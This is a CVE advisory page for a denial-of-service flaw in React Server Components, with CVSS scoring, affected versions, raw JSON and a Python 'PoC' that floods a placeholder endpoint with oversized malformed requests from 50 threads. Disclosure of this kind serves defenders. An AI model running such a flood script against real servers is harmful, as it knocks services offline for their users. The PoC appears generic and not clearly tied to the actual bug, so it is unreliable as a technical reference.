Security Vulnerability Report
中文
CVE-2026-23864 CVSS 7.5 HIGH

CVE-2026-23864

Published: 2026-01-26 20:16:17
Last Modified: 2026-02-13 15:23:05
Source: [email protected]

Description

Multiple denial of service vulnerabilities exist in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack. The vulnerabilities are triggered by sending specially crafted HTTP requests to Server Function endpoints, and could lead to server crashes, out-of-memory exceptions or excessive CPU usage; depending on the vulnerable code path being exercised, the application configuration and application code. Strongly consider upgrading to the latest package versions to reduce risk and prevent availability issues in applications using React Server Components.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:* - VULNERABLE
react-server-dom-parcel < 最新版本
react-server-dom-turbopack < 最新版本
react-server-dom-webpack < 最新版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23864 PoC - React Server Components DoS # This PoC demonstrates sending malformed requests to Server Function endpoints import requests import concurrent.futures import time TARGET_URL = "http://target-server.com/__react-server-function" PAYLOAD = { "args": [ { "__react$$": "malformed", "data": "A" * 100000 # Large payload to trigger resource exhaustion } ] } def send_malformed_request(): """Send a specially crafted HTTP request to trigger DoS condition""" headers = { "Content-Type": "application/json", "RSC-Action": "1", "X-React-Server-Component": "malicious" } try: response = requests.post( TARGET_URL, json=PAYLOAD, headers=headers, timeout=5 ) return response.status_code except requests.exceptions.RequestException as e: return f"Error: {e}" def exploit_dos(): """Launch distributed DoS attack against React Server Components endpoint""" print(f"[*] Starting DoS attack against {TARGET_URL}") print("[*] Sending malformed RSC requests...") with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor: futures = [executor.submit(send_malformed_request) for _ in range(100)] results = [f.result() for f in concurrent.futures.as_completed(futures)] print(f"[*] Attack completed. Results: {results[:10]}") if __name__ == "__main__": exploit_dos()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23864", "sourceIdentifier": "[email protected]", "published": "2026-01-26T20:16:16.773", "lastModified": "2026-02-13T15:23:05.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple denial of service vulnerabilities exist in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack.\n\nThe vulnerabilities are triggered by sending specially crafted HTTP requests to Server Function endpoints, and could lead to server crashes, out-of-memory exceptions or excessive CPU usage; depending on the vulnerable code path being exercised, the application configuration and application code.\n\nStrongly consider upgrading to the latest package versions to reduce risk and prevent availability issues in applications using React Server Components."}, {"lang": "es", "value": "Múltiples vulnerabilidades de denegación de servicio existen en los Componentes de Servidor de React, afectando los siguientes paquetes: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack.\n\nLas vulnerabilidades se activan al enviar solicitudes HTTP especialmente diseñadas a los puntos finales de las Funciones de Servidor, y podrían provocar caídas del servidor, excepciones por falta de memoria o uso excesivo de CPU; dependiendo de la ruta de código vulnerable que se esté ejecutando, la configuración de la aplicación y el código de la aplicación.\n\nConsidere encarecidamente actualizar a las últimas versiones de los paquetes para reducir el riesgo y prevenir problemas de disponibilidad en aplicaciones que utilizan Componentes de Servidor de React."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.0.0", "versionEndExcluding": "19.0.4", "matchCriteriaId": "0F93D6DB-994E-428D-970C-D50737B628CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.1.0", "versionEndExcluding": "19.1.5", "matchCriteriaId": "2151CF1A-4E87-421E-9714-3AA87639FD6B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:facebook:react:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.2.0", "versionEndExcluding": "19.2.4", "matchCriteriaId": "9FC73AD9-7EA4-4789-B75B-DC1FFF6F66AF"}]}]}], "references": [{"url": "https://www.facebook.com/security/advisories/cve-2026-23864", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.